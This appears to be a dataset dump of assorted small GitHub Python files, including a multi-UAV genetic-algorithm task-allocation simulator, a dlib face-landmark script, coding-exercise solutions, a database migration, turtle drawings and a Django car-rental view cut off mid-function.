max(new_fitness)}')\n fitness = new_fitness\n if (time.time() - previous_time) >= broadcast_interval:\n # uav = [[]for _ in range(len(all_agents_id))]\n # g = population[fitness.index(max(fitness))]\n # for i in range(len(g[0])):\n # uav[g[1][i]-1].append(g[0][i]-1)\n # x = [[all_agents_information[_][2]]for _ in range(len(all_agents_id))]\n # y = [[all_agents_information[_][3]]for _ in range(len(all_agents_id))]\n # for w, uu in enumerate(uav):\n # for t in uu:\n # x[w].append(targets_sites[t][0])\n # y[w].append(targets_sites[t][1])\n # plt.plot(x[w], y[w], '-')\n # plt.plot()\n # for task in targets_sites:\n # plt.plot(task[0], task[1], 'ro')\n # plt.show()\n\n ga_chromosome2task_execution(population, 
fitness)\n population, fitness = others_information2ga_thread(population, fitness)\n previous_time = time.time()\n print(f'y={y}')\n y = 0\n\n\ndef TaskSequenceExecution(uav, targets_sites, communication, ga2control_queue, control2ga_queue, u2g):\n # configuration\n uav = uav\n uav_site = [uav.x0, uav.y0]\n targets_sites = targets_sites\n targets_sites.append([uav.x0, uav.y0])\n # communication queue (broadcast and receive port between agents)\n communication = communication\n # communication between ga thread and task execution thread\n ga2control_port = ga2control_queue\n control2ga_port = control2ga_queue\n # u2g for results\n gcs = u2g\n task_status_list = [1 for _ in range(len(targets_sites)-1)]\n\n def decode_chromosome(chromosome):\n task_sequence = []\n for i, gene in enumerate(chromosome[1]):\n if gene == uav.uav_id:\n task_sequence.append(targets_sites[chromosome[0][i] - 1])\n task_sequence.append([uav.x0, uav.y0])\n return task_sequence\n\n def pack_chromosome(chromosome):\n # print(task_status_list)\n return [uav.uav_id, uav.velocity, uav.Rmin, uav_site[0], uav_site[1],\n chromosome, task_status_list]\n\n # build uav\n u = 0\n t = 0\n xn = uav.x0\n yn = uav.y0\n theta = uav.theta0\n list_for_u = [0]\n list_for_t = [0]\n task_allocation = []\n c = 0.1\n actual_x = [uav.x0]\n actual_y = [uav.y0]\n armed = False\n disarmed = False\n complete = False\n waypoint_radius = 50\n # communication setting\n broadcast_list = [i for i in range(len(communication)) if not i+1 == uav.uav_id]\n plot_time = 0\n # print(f'{uav.uav_id} broadcast_list: {broadcast_list}')\n previous_time = 0\n while True:\n # ---------------------- communication part ------------------------- #\n try:\n if not ga2control_port.empty():\n # get current best solution (from ga thread)-----------\n current_best_chromosome = ga2control_port.get(timeout=1)\n # print(f'uav{uav.uav_id}::best_solution:{ga_solution}')\n # if got current best solution from ga thread----------\n task_allocation = decode_chromosome(current_best_chromosome)\n print(f'UAV_{uav.uav_id} current_best: {current_best_chromosome}')\n # print(f'uav{uav.uav_id}_tasks:{task_allocation}')\n broadcast_packet = pack_chromosome(current_best_chromosome)\n # broadcast packet-------------------------------------\n for q in broadcast_list:\n communication[q].put(broadcast_packet)\n # get other uav information (xbee)---------------------\n receive_from_v2v = []\n while not len(receive_from_v2v) == len(communication)-1:\n try:\n v2v_message = communication[uav.uav_id - 1].get(timeout=1)\n receive_from_v2v.append(v2v_message)\n # update terminal task--------------------------\n for task, check in enumerate(v2v_message[-1]):\n if check == 0:\n task_status_list[task] = 0\n except queue.Empty:\n pass\n # give it to ga thread-----------------------------------\n control2ga_port.put(receive_from_v2v + [broadcast_packet])\n except queue.Empty:\n pass\n # ---------------------- control part ---------------------------- #\n if not task_allocation == [] and not armed: # first command\n armed = True\n print(f'UAV_{uav.uav_id} arm !!')\n previous_time = time.time() # mission start time\n\n if not armed or complete:\n continue\n else:\n # plot animation\n if time.time() - plot_time >= 0.5:\n gcs.put([uav.uav_id, xn, yn])\n plot_time = time.time()\n # print(task_allocation)\n assign = 0\n while distance_between_points([xn, yn], task_allocation[assign]) <= waypoint_radius:\n if task_allocation[assign] == [uav.x0, uav.y0]:\n actual_x.append(task_allocation[assign][0])\n 
actual_y.append(task_allocation[assign][1])\n disarmed = True\n task_allocation.clear()\n break\n task_status_list[targets_sites.index(task_allocation[0])] = 0\n # print(f'target: {task_allocation[0]} completed by uav{uav.uav_id}')\n assign += 1\n if disarmed:\n # gcs.put([uav.uav_id, actual_x, actual_y, list_for_t])\n print(f'UAV_{uav.uav_id} mission complete !!!!!!!!!!!!!!')\n armed = False\n complete = True\n elif distance_between_points([xn, yn], task_allocation[assign]) > waypoint_radius:\n angle_between_two_points = angle_between((xn, yn), task_allocation[assign][:2])\n dt = (time.time() - previous_time)\n previous_time = time.time()\n xn, yn, thetan = step(uav, xn, yn, theta, u, dt)\n relative_angle = angle_between_two_points - thetan\n error_of_heading = relative_angle if abs(relative_angle) <= 2 * pi - abs(relative_angle) \\\n else -(relative_angle / abs(relative_angle)) * (2 * pi - abs(relative_angle))\n if c >= error_of_heading >= -c:\n u = 0\n theta = thetan\n elif error_of_heading < -c:\n u = -1\n theta = thetan\n\n elif error_of_heading > c:\n u = 1\n theta = thetan\n else:\n u = 1\n theta = thetan\n\n actual_x.append(xn)\n actual_y.append(yn)\n t += dt\n list_for_u.append(u)\n list_for_t.append(t)\n\n uav_site = [xn, yn] # update current position\n\n\nif __name__ == '__main__':\n uav_position = [[1500, 0, np.pi/2], [-1500, 0, np.pi/2], [0, 0, np.pi/2]]\n # uav_position = [[0, 0, np.pi / 2]]\n uav_configuration = [[25, 75], [15, 50], [35, 100]]\n # uav_configuration = [[1, 2]]\n uav_num = len(uav_configuration)\n targets = [[-65,15],[27,66],[-51,58],[77,77],[0,39],\n [71,95],[-25,10],[0,91],[30,30],[-100,24],[38,75]]\n # targets = [[random.randint(-100, 100), random.randint(20, 100)] for _ in range(20)]\n targets = [list(np.array(task)*20) for task in targets]\n broadcast = [mp.Queue() for _ in range(uav_num)]\n control2ga_thread = [mp.Queue() for _ in range(uav_num)]\n ga2control_thread = [mp.Queue() for _ in range(uav_num)]\n GCS = mp.Queue()\n # build uav\n UAVs = [UAV(a + 1, uav_position[a], uav_configuration[a]) for a in range(uav_num)]\n # GA\n GA_threads = [mp.Process(target=GA_thread, args=(UAVs[a], targets, ga2control_thread[a], control2ga_thread[a]))\n for a in range(uav_num)]\n # control and communication\n TaskSequenceExecution_threads = [mp.Process(target=TaskSequenceExecution,\n args=(UAVs[a], targets, broadcast,\n ga2control_thread[a], control2ga_thread[a], GCS))\n for a in range(uav_num)]\n for a in range(uav_num):\n GA_threads[a].start()\n TaskSequenceExecution_threads[a].start()\n for t in targets:\n plt.plot(t[0], t[1], 'ko', markerfacecolor='none', markersize=8)\n for u in uav_position:\n plt.plot(u[0], u[1], 'r^', markerfacecolor='none', markersize=8)\n color_style = ['tab:blue', 'tab:green', 'tab:orange']\n while True:\n try:\n surveillance = GCS.get(timeout=1e-5)\n # print(surveillance)\n plt.plot(surveillance[1], surveillance[2], 'o', color=color_style[surveillance[0]-1], markersize=1)\n plt.pause(1e-10)\n except queue.Empty:\n pass\n # plot results\n # for data in result:\n # plt.plot(data[1], data[2], '-')\n # for t in targets:\n # plt.plot(t[0], t[1], 'bo')\n # for u in uav_position:\n # plt.plot(u[0], u[1], 'ro')\n # plt.show()\n","repo_name":"jerryfungi/Multi-UAV_Task_Allocation","sub_path":"decentralized_GA_VRP.py","file_name":"decentralized_GA_VRP.py","file_ext":"py","file_size_in_byte":18926,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"27"} +{"seq_id":"38219388810","text":"def 
_process_ratings(ratings):\n p_ratings = []\n for r in ratings:\n rating = r.strip(' ').strip('%').split('/')[0]\n if rating == '100':\n rating = 10\n elif float(rating) > 10:\n rating = float(f'{rating[0]}.{rating[1]}')\n else:\n rating = float(rating)\n p_ratings.append(rating)\n return p_ratings\n\n\ndef process_item(item):\n try:\n item['name'] = item['name'].rstrip(' ')\n item['description'] = item['description'].rstrip(' ')\n item['ratings'] = _process_ratings(item['ratings'])\n\n item['season_or_year'] = item['season_or_year'].strip(' (').strip(')')\n item['genre'] = item['genre'].lower().strip(' ').split(',')\n item['cast'] = item['cast'].rstrip(' ').split(', ')\n item['runtime'] = item['runtime'].strip(' ')\n item['language'] = item['language'].lower().strip(' ').split(',')\n item['awards'] = item.get('awards', '').rstrip(r'.\\t')\n item['director'] = item.get('director', '').split(', ')\n\n return item\n except KeyError:\n return item\n","repo_name":"ranzvi/netflix-app","sub_path":"netflix_app/utils/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":1099,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"20608488836","text":"#!/usr/bin/python3\n\"\"\"\nTest detection of face construction with 68 point predictor\nAuthor: Mikołaj Machowski, 2019\nLicense: MIT\n\"\"\"\n\nimport sys\nimport dlib\nfrom PIL import Image, ImageDraw\n\nDETECTOR = dlib.get_frontal_face_detector()\nPREDICTOR = dlib.shape_predictor('shape_predictor_68_face_landmarks.dat')\n\n# Split marks into separate features as per facial_landmarks_68markup.jpg\n# Tuple stores: start point, end point, color of line, type of line\n# We are getting to coordinates through range() so we need to get +1\n# to end point.\nFEATS = {\n 'right_brow': (17, 22, 'black', 'open'),\n 'left_brow': (22, 27, 'black', 'open'),\n 'right_eye': (36, 42, 'pink', 'close'),\n 'left_eye': (42, 48, 'pink', 'close'),\n 'face_oval': (0, 17, 'pink', 'open'),\n 'nose_bridge': (27, 32, 'pink', 'open'),\n 'nose_base': (30, 36, 'pink', 'close'),\n 'mouth_in': (60, 68, 'red', 'close'),\n 'mouth_out': (48, 60, 'red', 'close')\n }\n\ndef draw_shapes(canvas, shapes):\n \"\"\"\n Draw wired mask created from 68 landmarks.\n \"\"\"\n\n for feature in FEATS:\n coords = []\n for i in range(FEATS[feature][0], FEATS[feature][1]):\n coords.append((shapes.part(i).x, shapes.part(i).y))\n\n # We want to close some shapes and .polygon isn't good enough\n if FEATS[feature][3] == 'close':\n coords.append(coords[0])\n\n canvas.line(coords, fill=FEATS[feature][2], width=4, joint='curve')\n\n return canvas\n\ndef main():\n \"\"\"\n Main function processing images\n \"\"\"\n\n if len(sys.argv) < 2:\n raise SystemExit('Usage: Not enough arguments')\n\n\n for fname in sys.argv[1:]:\n img = dlib.load_rgb_image(fname)\n # We use source image only as source - whole drawing is done on blank\n # out_img\n in_img = Image.open(fname)\n out_img = Image.new('RGB', (in_img.width, in_img.height), 'white')\n # We will paste both images to final one to see them side by side\n final_img = Image.new('RGB', (in_img.width*2, in_img.height), 'white')\n\n # Prepare draw operations \n draw = ImageDraw.Draw(out_img)\n\n # Ask the detector to find the bounding boxes of each face.\n dets = DETECTOR(img, 1)\n for k, d in enumerate(dets):\n # Get the landmarks/parts for the face in box d.\n shape = PREDICTOR(img, d)\n # Draw wired contour on blank \n draw = draw_shapes(draw, shape)\n\n # Paste our original image and 
wire mask of 68 points onto background\n final_img.paste(in_img)\n final_img.paste(out_img, (in_img.width, 0))\n\n # Save output in separate directory\n fname = fname.replace('dane/', '')\n final_img.save(f'dane68/{fname}-68.jpg', 'JPEG')\n\nif __name__ == '__main__':\n main()\n","repo_name":"vvizzo/emotions","sub_path":"wired68.py","file_name":"wired68.py","file_ext":"py","file_size_in_byte":2826,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"37128771447","text":"import math\nfrom turtle import *\n\nbgcolor(\"black\")\nshape(\"turtle\")\nspeed(0)\nfillcolor(\"brown\")\n\nphi = 137.508 * (math.pi / 180.0)\n\nfor i in range(160 + 40):\n r = 4 * math.sqrt(i)\n theta = i * phi\n x = r * math.cos(theta)\n y = r * math.sin(theta)\n penup()\n goto(x, y)\n setheading(i * 137.508)\n pendown()\n\n if i < 160:\n stamp()\n else:\n fillcolor(\"yellow\")\n begin_fill()\n right(20)\n forward(70)\n left(40)\n forward(70)\n left(140)\n forward(70)\n left(40)\n forward(70)\n end_fill()\n\nhideturtle()\nmainloop()\n","repo_name":"W4LX/Drawings-Python","sub_path":"tulip.py","file_name":"tulip.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"12464427755","text":"class kart:\n def __init__(self):\n # self.inv = {'SHIRT':0,'SHOE':0}\n self.inv = {}\n # self.cost = {'SHIRT':-1,\"SHOE\":-1}\n self.cost = {}\n # self.kart = {'SHIRT':0,'SHOE':0}\n self.kart = {}\n \n def sm_add(self,item,qty):\n if int(qty) != qty or qty<=0 or item in self.inv:\n return -1\n qty = int(qty)\n self.inv[item] =qty\n return qty\n \n def sm_remove(self,item):\n if item not in self.inv:\n return -1\n del self.inv[item]\n return 1\n \n def sm_get_qty(self,item):\n if item not in self.inv:\n return 0\n return self.inv[item]\n \n def sm_inc(self,item,qty):\n if int(qty) != qty or qty<=0 or item not in self.inv:\n return -1\n qty = int(qty)\n self.inv[item]+=qty\n return qty\n \n def sm_dec(self,item,qty):\n if int(qty) != qty or qty<=0 or item not in self.inv:\n return -1\n qty = int(qty)\n self.inv[item]-=qty\n if self.inv[item] == 0:\n del self.inv[item]\n return qty\n \n def sm_set_cost(self,item,cost):\n # if item not in self.inv:\n # return -1\n\n self.cost[item] = cost\n return cost\n \n def s_add(self,item,qty):\n if int(qty) != qty or qty<=0 or item in self.kart:\n return -1\n qty = int(qty)\n self.kart[item]=qty\n return qty\n \n def s_remove(self,item):\n if item not in self.kart:\n return -1\n del self.kart[item]\n return 1\n \n def s_inc(self,item,qty):\n if int(qty) != qty or qty<=0 or item not in self.kart:\n return -1\n qty = int(qty)\n self.kart[item]+=qty\n return qty\n\n def s_dec(self,item,qty):\n if int(qty) != qty or qty<=0 or item not in self.kart:\n return -1\n qty = int(qty)\n self.kart[item]-=qty\n if self.kart[item] == 0:\n del self.kart[item]\n return qty\n \n def s_get_amount(self):\n # print(self.kart)\n # print(self.cost)\n sm = 0\n for i in self.kart:\n if i in self.kart and (i not in self.inv or i not in self.cost):\n return -1\n sm+=(self.kart[i]*self.cost[i])\n return round(sm,2)\n\nfor _ in range(int(input())):\n obj = kart()\n while True:\n s = input().split()\n if s[0] == \"END\":\n break\n if s[1] == \"SM\":\n if s[2] == \"ADD\":\n print(obj.sm_add(s[3],float(s[4])))\n elif s[2] == \"REMOVE\":\n print(obj.sm_remove(s[3]))\n elif s[2] == \"GET_QTY\":\n print(obj.sm_get_qty(s[3]))\n elif s[2] == \"INCR\":\n 
print(obj.sm_inc(s[3],float(s[4])))\n elif s[2] == \"DCR\":\n print(obj.sm_dec(s[3],float(s[4])))\n elif s[2] == \"SET_COST\":\n print(obj.sm_set_cost(s[3],float(s[4])))\n else:\n print(-1)\n elif s[1] == \"S\":\n if s[2] == 'ADD':\n print(obj.s_add(s[3],float(s[4])))\n elif s[2] == 'REMOVE':\n print(obj.s_remove(s[3]))\n elif s[2] == \"INCR\":\n print(obj.s_inc(s[3],float(s[4])))\n elif s[2] == \"DCR\":\n print(obj.s_dec(s[3],float(s[4])))\n elif s[2] == \"GET_ORDER_AMOUNT\":\n print(obj.s_get_amount())\n else:\n print(-1)\n ","repo_name":"VaibhavD143/Coding","sub_path":"MockVita/b.py","file_name":"b.py","file_ext":"py","file_size_in_byte":3536,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"40025403617","text":"\"\"\"\nMetacatalog database revision\n-----------------------------\ndate: 2021-02-05T08:48:28.689614\n\nrevision #3\n\nExtend person to have a UUID\n\n\"\"\"\nfrom sqlalchemy.orm import Session\nfrom metacatalog import api, models\nfrom uuid import uuid4\n\n\nUPGRADE_SQL = \"\"\"\n-- add columns\nALTER TABLE public.persons ADD COLUMN uuid character varying (36);\nCOMMIT;\n\"\"\"\nDOWNGRADE_SQL = \"\"\"\nALTER TABLE public.persons DROP COLUMN uuid;\nCOMMIT;\n\"\"\"\n\n# define the upgrade function\ndef upgrade(session: Session):\n # create the new column\n with session.bind.connect() as con:\n con.execute(UPGRADE_SQL)\n \n # fill any uuid that is mission\n persons = session.query(models.Person).filter(models.Person.uuid == None).all()\n for person in persons:\n person.uuid = str(uuid4())\n try:\n session.add(person)\n session.commit()\n except Exception as e:\n print('[ERROR]: %s' % str(e))\n\n\n# define the downgrade function\ndef downgrade(session: Session):\n with session.bind.connect() as con:\n con.execute(DOWNGRADE_SQL)\n\n","repo_name":"VForWaTer/metacatalog","sub_path":"metacatalog/db/revisions/rev3.py","file_name":"rev3.py","file_ext":"py","file_size_in_byte":1070,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"17140519219","text":"from turtle import Turtle\n\nALIGNMENT = 'center'\nFONT = (\"Courier\", 40, \"bold\")\n\n\nclass ScoreBoard(Turtle):\n\n def __init__(self):\n super().__init__()\n self.color(\"white\")\n self.dashed_line()\n self.left_score = 0\n self.right_score = 0\n self.left_player_score()\n self.right_player_score()\n\n def dashed_line(self):\n self.penup()\n self.goto(0, -280)\n self.setheading(90)\n self.width(5)\n\n draw_line = True\n while draw_line:\n if self.ycor() > 280:\n draw_line = False\n else:\n self.forward(15)\n self.hideturtle()\n self.penup()\n self.forward(15)\n self.down()\n\n def left_player_score(self):\n self.hideturtle()\n self.penup()\n self.goto(-30, 240)\n self.write(arg=f\"{self.left_score}\", move=True, align=ALIGNMENT, font=FONT)\n\n def right_player_score(self):\n self.hideturtle()\n self.penup()\n self.goto(30, 240)\n self.write(arg=f\"{self.right_score}\", move=True, align=ALIGNMENT, font=FONT)\n\n def increase_score_left(self):\n self.clear()\n self.right_player_score()\n self.dashed_line()\n self.left_score += 1\n self.hideturtle()\n self.penup()\n self.goto(-30, 240)\n self.write(arg=f\"{self.left_score}\", move=True, align=ALIGNMENT, font=FONT)\n\n def increase_score_right(self):\n self.clear()\n self.left_player_score()\n self.dashed_line()\n self.right_score += 1\n self.hideturtle()\n self.penup()\n self.goto(30, 240)\n self.write(arg=f\"{self.right_score}\", move=True, align=ALIGNMENT, 
font=FONT)","repo_name":"kmyutani/python_practice_projects","sub_path":"pong_game/scoreboard.py","file_name":"scoreboard.py","file_ext":"py","file_size_in_byte":1757,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"43684955012","text":"import math\nfrom functools import reduce\nfrom collections import deque\nimport sys\nsys.setrecursionlimit(10**7)\n\n# スペース区切りの入力を読み込んで数値リストにして返します。\ndef get_nums_l():\n return [ int(s) for s in input().split(\" \")]\n\n# 改行区切りの入力をn行読み込んで数値リストにして返します。\ndef get_nums_n(n):\n return [ int(input()) for _ in range(n)]\n\n# 改行またはスペース区切りの入力をすべて読み込んでイテレータを返します。\ndef get_all_int():\n return map(int, open(0).read().split())\n\ndef log(*args):\n print(\"DEBUG:\", *args, file=sys.stderr)\n\n# Union-Find\ndef root(i):\n if node_groups[i] == i:\n return i\n else:\n node_groups[i] = root(node_groups[i])\n return node_groups[i]\n\ndef same(a, b):\n return root(a) == root(b)\n\ndef size(i):\n return group_sizes[root(i)]\n\ndef unite(a, b):\n a = root(a)\n b = root(b)\n\n if a == b:\n return\n\n if group_ranks[a] < group_ranks[b]:\n group_sizes[b] += size(a)\n node_groups[a] = b\n else:\n group_sizes[a] += size(b)\n node_groups[b] = a\n if group_ranks[a] == group_ranks[b]:\n group_ranks[a] += 1\n\n\nn,m,k = get_nums_l()\n\nlines = list(map(lambda s: s.strip(), sys.stdin.readlines()))\nfriends = list(map(lambda s: list(map(int, s.split())), lines[:m]))\nblocks = list(map(lambda s: list(map(int, s.split())), lines[m:]))\n\n\nnodes = n+1\nnode_groups = [ i for i in range(nodes)]\ngroup_sizes = [ 1 for _ in range(nodes)]\ngroup_ranks = [ 0 for _ in range(nodes)]\n\nedges = []\nfor f in friends:\n unite(f[0], f[1])\n\ngroup_nodes = [set() for _ in range(nodes)]\nfor node in range(1, n+1):\n group_nodes[root(node)].add(node)\n\nkouho = [0] * nodes\nfor node in range(1, n+1):\n kouho[node] = (len(group_nodes[root(node)]) -1 )\n# log(\"kouhoA\", kouho)\n\nfor fr in friends:\n kouho[fr[0]] -= 1\n kouho[fr[1]] -= 1\nfor bl in blocks:\n if same(bl[0], bl[1]):\n kouho[bl[0]] -= 1\n kouho[bl[1]] -= 1\n\nprint(\" \".join(map(str, kouho[1:])))","repo_name":"mui-nyan/AtCoder","sub_path":"abc/abc157/D.py","file_name":"D.py","file_ext":"py","file_size_in_byte":2079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"8179273711","text":"from typing import List\n\n\nclass Solution:\n def twoSum(self, nums: List[int], target: int) -> List[int]:\n h = {}\n for i, num in enumerate(nums):\n print(\"I: \" + str(i))\n print(\"Num: \" + str(num))\n n = target - num\n if n not in h: # Checks if n is key in hashmap\n h[num] = i # adds to hashmap where key: Num and Value: i\n else:\n return [h[n], i]\n\n\nif __name__ == \"__main__\":\n GivenNums = [2, 7, 11, 15]\n target = 9\n ans = Solution.twoSum(Solution, GivenNums, target)\n\n'''\nNOTES\nEnumerate returns the [Index, ValueItself]\n'''","repo_name":"Cheezfri/LeetCodePractice","sub_path":"Easy Problems/Q0001_TwoSums.py","file_name":"Q0001_TwoSums.py","file_ext":"py","file_size_in_byte":634,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"13955134193","text":"import sys\nsys.stdin = open('input.txt', encoding='UTF-8')\n\nN = int(input())\nnums = list(map(int, input().split()))\n\nnum_sort = sorted(list(set(nums)))\n\n\nfor i in nums:\n print(num_sort.index(i), end=' ')\n\n# 이 방법도 O(n^2) 복잡도라 안 된다!","repo_name":"LeeHyeonT/TIL","sub_path":"algorithm/baekjun/220616/18870 좌표 
압축/solution2.py","file_name":"solution2.py","file_ext":"py","file_size_in_byte":255,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"36237243389","text":"'''\n#FILE: NUMPY TRICKS\nProject: Basic concepts in Python\n-------------------\nBy: Anh Dang\nDate: 2019-07-17\nDescription:\nSome illustrations for basic concepts in Python\n'''\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\n## Change the type\narr = np.array(['1','2','3'], dtype='str')\narr = arr.astype('float')\n\n## need to use the copy, as the slice is still based on arr\narr = np.arange(10)\narr_slice = arr[5:8].copy()\narr_slice[1] = 12345\narr\n\n## Boolean mask\nnames = np.array(['Bob', 'Joe', 'Will', 'Bob', 'Will', 'Joe', 'Joe'])\nnames[names != 'Bob']\nnames[~(names == 'Bob')]\n\n## create 2-dim array \npoints = np.arange(-5, 5, 0.01)\nxs, ys = np.meshgrid(points, points) ## produce all pairs of points, spread the space\nz = np.sqrt(xs**2 + ys**2)\n\npoints.shape #1000\nxs.shape #1000x1000\n\n#plt.imshow(z, cmap=plt.cm.gray); \n#plt.colorbar()\n#plt.title(\"Image plot of $\\sqrt{x^2 + y^2}$ for a grid of values\")\n\n\n# Expressing Conditional Logic as Array Operations\nxarr = np.array([1.1, 1.2, 1.3, 1.4, 1.5])\nyarr = np.array([2.1, 2.2, 2.3, 2.4, 2.5])\ncond = np.array([True, False, True, True, False])\n[ (x if c else y) for x, c, y in zip(xarr, cond, yarr)]\n## equivalent\nnp.where(cond, xarr, yarr)\n\n\n# Mathematical & Statistical Method\narr = np.random.randn(100)\n(arr < 0).sum()\n(arr < 0).any()\n(arr < 0).all()\n\n\n# Linear Algebra\nfrom numpy.linalg import inv, qr\n\nX = np.random.randn(5, 5)\nmat = X.T.dot(X) ## X'X\ninv(mat) ## (X'X)^-1\nmat.dot(inv(mat)) ## (X'X) x (X'X)^-1\n\nq, r = qr(mat) ## QR decomposition\nq\nr\n\nseries = np.array([0,0,1,4,1,1,1])\nseries.argmax()","repo_name":"anhdanggit/portfolio-risk-finance","sub_path":"02-Basics/05-numpy.py","file_name":"05-numpy.py","file_ext":"py","file_size_in_byte":1563,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"31940334418","text":"from rest_framework import status\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\n\n\nclass Test(APIView):\n @staticmethod\n def post(request):\n id = request.data.get('id')\n\n if not (id and id.isdigit()):\n data = dict(error=\"Bad request!\")\n return Response(data=data, status=status.HTTP_400_BAD_REQUEST)\n\n id = int(id)\n\n names = {\n 1: 'Артём',\n 2: 'Антон',\n 3: 'Артём',\n 4: 'Паша',\n 5: 'Ваня',\n }\n data = dict(status=\"Success!\", name=names.get(id))\n return Response(data=data, status=status.HTTP_200_OK)\n","repo_name":"kenigteh/udicate","sub_path":"src/api/views/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"1205298255","text":"\n# https://www.hackerrank.com/challenges/collections-counter/problem?isFullScreen=true\n# Enter your code here. Read input from STDIN. 
Print output to STDOUT\nfrom collections import Counter\nx = int(input())\nli = list(map(int,input().split()))\nn = int(input())\nmoney = 0\nfor i in range(n):\n shoe_size = Counter(li)\n size,cost = map(int,input().split())\n if size in shoe_size:\n li.remove(size)\n money+=int(cost)\nprint(money)\n\n","repo_name":"AnushreeBaghwar/hackerRank","sub_path":"Collections counter.py","file_name":"Collections counter.py","file_ext":"py","file_size_in_byte":446,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"42620807156","text":"from __future__ import annotations\n\nimport argparse\n\nfrom dl_db_testing.loader import load_db_testing_lib\nfrom dl_formula_ref.generator import (\n ConfigVersion,\n ReferenceDocGenerator,\n)\nfrom dl_formula_ref.loader import load_formula_ref\n\n\nparser = argparse.ArgumentParser(prog=\"Example data management tool\")\nsubparsers = parser.add_subparsers(title=\"command\", dest=\"command\")\n\nsubparsers.add_parser(\"generate\", help=\"Generate data for examples\")\n\n\nclass ExampleDataTool:\n @classmethod\n def generate_example_data(cls):\n \"\"\"\n Requires a DB URL mapping in local file `dl_formula_ref/db_config.json`\n with the following format:\n\n {\n \"CLICKHOUSE_21_8\": \"clickhouse://datalens:qwerty@localhost:50456/formula_test\"\n }\n\n defining all the required database types:\n - CLICKHOUSE_21_8\n \"\"\"\n ref_doc_generator = ReferenceDocGenerator(locale=\"en\", config_version=ConfigVersion.default)\n ref_doc_generator.generate_example_data()\n\n print(\"Generated data successfully\")\n\n @classmethod\n def run(cls, args):\n tool = cls()\n\n if args.command == \"generate\":\n tool.generate_example_data()\n\n\ndef main():\n load_formula_ref()\n load_db_testing_lib()\n ExampleDataTool.run(parser.parse_args())\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"AlexRogalskiy/datalens-backend","sub_path":"lib/dl_formula_ref/dl_formula_ref/scripts/example_data.py","file_name":"example_data.py","file_ext":"py","file_size_in_byte":1349,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"27"} +{"seq_id":"21669454325","text":"\"\"\"\nWhen you physically exercise to strengthen your heart, you\nshould maintain your heart rate within a range for at least 20\nminutes. To find that range, subtract your age from 220. This\ndifference is your maximum heart rate per minute. 
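For example, a 30-year-old has a maximum of 220 - 30 = 190 beats per minute. 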
Your heart\nsimply will not beat faster than this maximum (220 - age).\nWhen exercising to strengthen your heart, you should keep your\nheart rate between 65% and 85% of your heart's maximum rate.\n\"\"\"\n\n#ask person's age\nage = float(input(\"Please enter your age: \"))\n\n#perform the calculations\nrange = 220 - age\nsixty_five_percent = (65 * range) / 100\neighty_five_percent = (85 * range) / 100\n\n#print the result using an f-string\nprint(\n f\"When you exercise to strengthen your heart, you should\",\n f\"keep your heart rate between {sixty_five_percent: .0f} and {eighty_five_percent: .0f} beats per minute.\"\n)\n","repo_name":"nmelgar/CSE_111_BYUI","sub_path":"week1/heart_rate.py","file_name":"heart_rate.py","file_ext":"py","file_size_in_byte":847,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"73574639431","text":"from django.shortcuts import render, redirect, reverse\nfrom .forms import ReservationForm\nfrom .models import Car, Reservation, Booking\nimport datetime\n\ntoday = datetime.date.today()\n\n# Create your views here.\ndef index_view(request, *args, **kwargs):\n reservation = Reservation()\n if request.method != 'POST':\n form = ReservationForm()\n else:\n form = ReservationForm(data=request.POST)\n form.reservation_from = today\n if form.is_valid():\n reservation.reservation_from = form.cleaned_data['reservation_from']\n reservation.reservation_to = form.cleaned_data['reservation_to']\n reservation.car_seats = form.cleaned_data['car_seats']\n reservation.car_fuel = form.cleaned_data['car_fuel']\n reservation.car_transmission = form.cleaned_data['car_transmission']\n reservation.save()\n return redirect('car_rental:available_cars', reservation_id=reservation.id)\n template = 'index.html'\n context = {}\n context['form'] = form\n return render(request, template, context)\n\n\ndef available_cars_view(request, reservation_id):\n reservation = Reservation.objects.get(id=reservation_id)\n cars = Car.objects.all()\n bookings = Booking.objects.all()\n available_cars = []\n not_available_cars = []\n rental_days_amount = (reservation.reservation_to - reservation.reservation_from).days\n for booking in bookings:\n if booking.booking_from <= reservation.reservation_from <= booking.booking_to or \\\n booking.booking_from <= reservation.reservation_to <= booking.booking_to:\n if booking.booked_car.id not in not_available_cars:\n not_available_cars.append(booking.booked_car.id)\n for car in cars:\n if car.car_seats > reservation.car_seats:\n if car.id not in not_available_cars:\n not_available_cars.append(car.id)\n elif car.car_transmission != reservation.car_transmission:\n if car.id not in not_available_cars:\n not_available_cars.append(car.id)\n elif car.car_fuel != reservation.car_fuel:\n if car.id not in not_available_cars:\n not_available_cars.append(car.id)\n\n for car in cars:\n if car.id not in not_available_cars:\n available_cars.append(car)\n\n print(available_cars)\n print(not_available_cars)\n\n template = 'available_cars.html'\n context = {}\n start_date = str(reservation.reservation_from)\n end_date = str(reservation.reservation_to)\n\n try:\n # create sessions for start and end date of reservation\n 